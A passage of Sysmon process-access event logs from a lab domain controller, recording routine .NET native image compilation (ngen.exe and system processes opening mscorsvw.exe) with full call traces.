{"EventTime":"2020-08-01 07:00:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7435,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:54.152\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1326-5F25-0000-0010A8520B00}\r\nTargetProcessId: 3704\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:54.152","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1326-5F25-0000-0010A8520B00}","TargetProcessId":"3704","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7436,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:54.152\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1326-5F25-0000-0010A8520B00}\r\nTargetProcessId: 3704\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:54.152","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1326-5F25-0000-0010A8520B00}","TargetProcessId":"3704","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7437,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:54.168\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1326-5F25-0000-0010A8520B00}\r\nTargetProcessId: 3704\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:54.168","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1326-5F25-0000-0010A8520B00}","TargetProcessId":"3704","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7438,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:54.371\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1326-5F25-0000-0010C8560B00}\r\nTargetProcessId: 4740\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:54.371","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1326-5F25-0000-0010C8560B00}","TargetProcessId":"4740","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7439,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:54.371\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1326-5F25-0000-0010C8560B00}\r\nTargetProcessId: 4740\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:54.371","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1326-5F25-0000-0010C8560B00}","TargetProcessId":"4740","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7440,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:54.387\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1326-5F25-0000-0010C8560B00}\r\nTargetProcessId: 4740\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:54.387","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1326-5F25-0000-0010C8560B00}","TargetProcessId":"4740","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7441,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:54.480\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1326-5F25-0000-0010ED590B00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:54.480","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1326-5F25-0000-0010ED590B00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7442,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:54.480\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1326-5F25-0000-0010ED590B00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 